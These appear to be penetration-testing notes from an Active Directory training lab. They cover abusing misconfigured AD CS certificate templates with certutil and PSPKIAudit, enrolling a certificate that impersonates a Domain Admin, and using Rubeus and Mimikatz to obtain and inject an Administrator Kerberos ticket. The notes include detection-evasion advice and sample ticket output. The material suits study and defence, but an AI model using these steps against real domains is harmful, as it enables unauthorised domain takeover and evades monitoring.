Certificates
AD Certificate Services (CS) is Microsoft's Public Key Infrastructure (PKI) Implementation. Since AD provides a Level of Trust in an Organizations, it can be used as a CA to Prove and Delegate Trust. AD CS is used to Encrypting File Systems, Creating and Verifying Digital Signatures, and User Authentication.
Since AD CS is a Privileged function, it usually runs on selected Domain Controllers. Meaning Normal Users can't really interact with the Service Directly. But Organizations tend to be too large to have an Administrator create and distribute each Certificate Manually. This is where Certificate Templates are used.
Administrators of AD CS can create several Templates that can Allow any User with the Relevant Permissions to request a Certificate themselves. These Templates have Parameters that say which User can request the Certificate and what is Required. Specific combinations of these parameters can be Abused for Privilege Escalation and Persistent Access.
Finding Vulnerable Certificate Templates
To find Vulnerable Templates we can use the Windows Built-In Tool certutil. This will provide output on all Configured Templates.
- We are looking for a Template with the following Poisonous Parameter Combination:
- Client Authentication - The Certificate can be used for Client Authentication.
- CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT - The Certificate Template allows us to specify the Subject Alternative Name (SAN).
- CTPRIVATEKEY_FLAG_EXPORTABLE_KEY - The Certificate will be exportable with the Private Key.
- Certificate Permissions - We have the required Permissions to use the Certificate Template.
- Export Available Certificates
- Vulnerable Certificate
:: Dump Output on all Configured Templates
certutil -Template -v > Templates.txt
TemplatePropCommonName = Web Server Cert Template
TemplatePropFriendlyName = Web Server Cert Template
TemplatePropEKUs =
2 ObjectIds:
1.3.6.1.5.5.7.3.2 Client Authentication
1.3.6.1.5.5.7.3.1 Server Authentication
TemplatePropCryptoProviders =
0: Microsoft RSA SChannel Cryptographic Provider
1: Microsoft DH SChannel Cryptographic Provider
TemplatePropMajorRevision = 64 (100)
TemplatePropDescription = Computer
TemplatePropSchemaVersion = 2
TemplatePropMinorRevision = 8
TemplatePropRASignatureCount = 0
TemplatePropMinimumKeySize = 800 (2048)
TemplatePropOID =
1.3.6.1.4.1.311.21.8.1823699.10350885.1394572.4929479.14975766.202.6863080.14328679 Web Server Cert Template
TemplatePropV1ApplicationPolicy =
2 ObjectIds:
1.3.6.1.5.5.7.3.2 Client Authentication
1.3.6.1.5.5.7.3.1 Server Authentication
TemplatePropEnrollmentFlags = 1
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
TemplatePropSubjectNameFlags = 1
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
TemplatePropPrivateKeyFlags = 1010010 (16842768)
CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
TEMPLATE_SERVER_VER_2003<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 10000 (65536)
TEMPLATE_CLIENT_VER_XP<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 1000000 (16777216)
TemplatePropGeneralFlags = 20241 (131649)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
CT_FLAG_MACHINE_TYPE -- 40 (64)
CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
CT_FLAG_IS_MODIFIED -- 20000 (131072)
TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-500G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3885271727-2693558621-2658995185-6150)(OA;;CR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;S-1-5-21-3885271727-2693558621-2658995185-6150)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-512)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPRC;;;S-1-5-21-3885271727-2693558621-2658995185-6150)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-512)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-500)(A;;LCRPLORC;;;AU)
Allow Enroll ZA\THMSERVER2$
Allow Auto-Enroll ZA\THMSERVER2$
Allow Enroll ADOBE\Domain Admins
Allow Enroll ADOBE\Enterprise Admins
Allow Read ZA\THMSERVER2$
Allow Full Control ADOBE\Domain Admins
Allow Full Control ADOBE\Enterprise Admins
Allow Full Control ADOBE\Administrator
Allow Read NT AUTHORITY\Authenticated Users
TemplatePropExtensions =
4 Extensions:
Extension[0]:
1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2f
Certificate Template Information
Template=Web Server Cert Template(1.3.6.1.4.1.311.21.8.1823699.10350885.1394572.4929479.14975766.202.6863080.14328679)
Major Version Number=100
Minor Version Number=8
Extension[1]:
2.5.29.37: Flags = 0, Length = 16
Enhanced Key Usage
Client Authentication (1.3.6.1.5.5.7.3.2)
Server Authentication (1.3.6.1.5.5.7.3.1)
Extension[2]:
2.5.29.15: Flags = 1(Critical), Length = 4
Key Usage
Digital Signature, Key Encipherment (a0)
Extension[3]:
1.3.6.1.4.1.311.21.10: Flags = 0, Length = 1a
Application Policies
[1]Application Certificate Policy:
Policy Identifier=Client Authentication
[2]Application Certificate Policy:
Policy Identifier=Server Authentication
TemplatePropValidityPeriod = 2 Years
TemplatePropRenewalPeriod = 6 Weeks
The Process of finding a Vulnerable Certificate can be Automated with PSPKIAudit. Although a Manual approach is Recommended.
PSPKIAudit
- Unblock - Import
- Usage
- Invoke-PKIAudit
- Get-CertRequest
# Unblocks files that were Downloaded from the Internet
Get-ChildItem -Recurse | Unblock-File
# Sets Execution Policies for Windows Computers
Set-ExecutionPolicy Bypass -Scope process -Force
# Adds Modules to the Current Session
Import-Module .\PSPKIAudit.psm1
# Audits the current Forest's AD CS Settings, primarily analyzing the CA Server and Published Templates for potential Privilege Escalation Opportunities
# Will not Require Administrative Privileges
Invoke-PKIAudit
# Examines a CA's Issued Certificates by Querying the CA's Database
# Will Require Administrative Privileges
Get-CertRequest
[!] Potentially vulnerable Certificate Templates:
CA : THMDC.za.adobe.loc\za-THMDC-CA
Name : WebTemplateRequest
SchemaVersion : 2
OID : Web Template Request (1.3.6.1.4.1.311.21.8.1823699.10350885.1394572.4929479.14975766.202.10870603.3260348)
VulnerableTemplateACL : True
LowPrivCanEnroll : False
EnrolleeSuppliesSubject : True
EnhancedKeyUsage : Client Authentication (1.3.6.1.5.5.7.3.2)|Secure Email (1.3.6.1.5.5.7.3.4)|Encrypting File System (1.3.6.1.4.1.311.10.3.4)
HasAuthenticationEku : True
HasDangerousEku : False
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : ADOBE\Administrator
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read
ADOBE\Administrator (Allow) - Read, Write
ADOBE\Domain Admins (Allow) - Read, Write, Enroll
ADOBE\Domain Users (Allow) - Read, Write, FullControl
ADOBE\Enterprise Admins (Allow) - Read, Write, Enroll
Misconfigurations : ESC4
CA : THMDC.za.adobe.loc\za-THMDC-CA
RequestID : 2
RequesterName : ZA\THMDC$
RequesterMachineName : THMDC.za.adobe.loc
RequesterProcessName : MMC.EXE
SubjectAltNamesExtension :
SubjectAltNamesAttrib :
SerialNumber : 100000000257821a5266648578000000000002
CertificateTemplate : Kerberos Authentication (1.3.6.1.4.1.311.21.8.1823699.10350885.1394572.4929479.14975766.202.1.33)
RequestDate : 4/27/2022 7:42:18 PM
StartDate : 4/27/2022 7:32:18 PM
EndDate : 4/27/2023 7:32:18 PM
[...]
Exploiting a Certificate Template
AdministratorsMake sure Restricted Admin Mode is Disabled.
RDP into the Target Machine with Administrator Privileges.
- Start the
Microsoft Management Console(MMC):- Click File ➜ Add/Remove Snap-In..
- Add the Certificates Snap-In and make sure to select Computer Account and Local Computer on the prompts.
- Click OK
- We should now see the Certificate Snap-In.
- We will now Request a Personal Certificate:
- Right Click on Personal and select All Tasks ➜ Request New Certificate..
- Click Next Twice to select the AD Enrollment Policy.
- We will see that we have one Template that we can Request, but first, we need to provide Additional Information.
- Click on the More Information Warning.
- Change the Subject Name Type option to Common Name and provide any Value, since it does not matter, and click Add.
- Change the Alternative Name Type option to User Principal Name.
- Supply the UPN of the User you want to Impersonate. The best would be a DA Account such as
Administrator@za.adobe.locand click Add. - Click Apply and OK.
- Now select the Certificate and click Enroll. We should be able to see our Certificate.
- The last step is to Export our Certificate with the Private Key:
- Right-Click on the Certificate and select All Tasks ➜ Export..
- Click Next, select Yes, Export the Private Key, and click Next.
- Click Next, then set a Password for the Certificate since the Private Key cannot be exported without a Password.
- Click Next and select a Location to Store the Certificate.
- Click Next and finally click Finish.
User Impersonation Through a Certificate
Now we can Impersonate a User. To perform this, two steps are Required:
- Use the Certificate to request a Kerberos
Ticket-Granting Ticket(TGT) - Load the Kerberos TGT
For the first step we can use Rubeus. A Tool for raw Kerberos Interaction and Abuses.
- Rubeus
- Output
:: [user] - Specifies the User that we will Impersonate and has to match the UPN for the Certificate we Generated
:: [enctype] - This specifies the Encryption type for the Ticket. Setting this is Important for Evasion, since the Default Encryption algorithm is weak, which would result in an Overpass-The-Hash Alert
:: [certificate] - Path to the Certificate we Generated
:: [password] - Password for our Certificate File
:: [outfile] - The File where our TGT will be Output
:: [domain] - FQDN of the Domain we are Currently Attacking
:: [dc] - The IP of the Domain Controller which we are Requesting the TGT from. Usually it is best to select a DC that has a CA Service Running
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate: /password: /outfile: /domain:za.adobe.loc /dc:
:: Query Example
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\arthur.holland\Desktop\certificate.pfx /password:492xzL5O4TS /outfile:administrator.kirbi /domain:za.adobe.loc /dc:10.20.30.50
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=Lilac
[*] Building AS-REQ (w/ PKINIT preauth) for: 'za.adobe.loc\Administrator'
[+] TGT Request Successful!
[*] base64(ticket.kirbi):
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
[*] Ticket Written to administrator.kirbi
ServiceName : krbtgt/za.adobe.loc
ServiceRealm : ZA.ADOBE.LOC
UserName : Administrator
UserRealm : ZA.ADOBE.LOC
StartTime : 1/11/2023 11:47:17 PM
EndTime : 1/12/2023 9:47:17 AM
RenewTill : 1/18/2023 11:47:17 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : GnxJcdGwXuWR6kLOWmmHRecqAt8UhHbJQ2u1rFuHYpo=
ASREP (key) : 5AD1D9AF66BDDEEF0BC1E665FE6FF8CF75BDBC012DCE362A9339DB80281DDC34
Now we can use Mimikatz to load the TGT and Authenticate. After that we can Verify that the Tickets were correctly Injected with the Windows Built-In Command klist.
privilege::debug
:: Name of the Ticket to Impersonate
kerberos::ptt administrator.kirbi